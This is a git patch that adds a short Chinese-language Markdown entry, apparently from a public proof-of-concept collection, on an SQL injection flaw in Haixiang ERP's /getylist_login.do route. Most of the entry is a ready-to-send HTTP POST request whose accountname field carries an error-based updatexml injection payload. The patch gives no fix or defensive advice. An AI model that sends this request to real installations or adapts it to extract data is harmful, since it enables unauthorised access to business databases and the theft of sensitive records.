From 9375dafe470e07a25ca9eb6f150d4aa6c3c4e8da Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 27 Dec 2023 20:30:45 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B5=B7=E7=BF=94ERP=20SQL=E6=B3=A8?=
 =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 海翔ERP SQL注入漏洞.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 海翔ERP SQL注入漏洞.md

diff --git a/海翔ERP SQL注入漏洞.md b/海翔ERP SQL注入漏洞.md
new file mode 100644
index 0000000..3a1c6db
--- /dev/null
+++ b/海翔ERP SQL注入漏洞.md	
@@ -0,0 +1,18 @@
+## 海翔ERP SQL注入漏洞
+
+海翔ERP存在SQL注入漏洞，由于系统未对用户输入的内容进行过滤，攻击者可以通过/getylist_login.do路由进行SQL注入，从而获取数据库中的敏感信息。
+
+
+## poc
+```
+POST /getylist_login.do HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 77
+Accept-Encoding: gzip
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+accountname=test' and (updatexml(1,concat(0x7e,(select md5(123)),0x7e),1));--
+```
+